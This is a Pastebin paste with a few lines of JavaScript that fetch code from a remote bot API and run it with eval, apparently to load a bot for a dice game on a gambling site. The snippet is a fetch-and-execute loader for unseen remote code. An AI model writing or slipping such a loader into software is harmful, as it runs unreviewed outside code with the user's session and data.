Advertisement
Ypleitez

Untitled

Nov 19th, 2023
46
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.27 KB | None | 0 0
  1.  
  2. const WDB_API = 'https://api-bot.mhqb365.com';
  3. const CASINO_GAME = 'wintomato-dice';
  4. (async function () {
  5. let installer = await fetch(WDB_API + '/stable/init')
  6. installer = await installer.text()
  7. eval(installer)
  8. })();
  9.  
  10.  
  11.  
  12.  
  13. 718268c3-db48-46a4-bfa0-84eb6395dab8
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement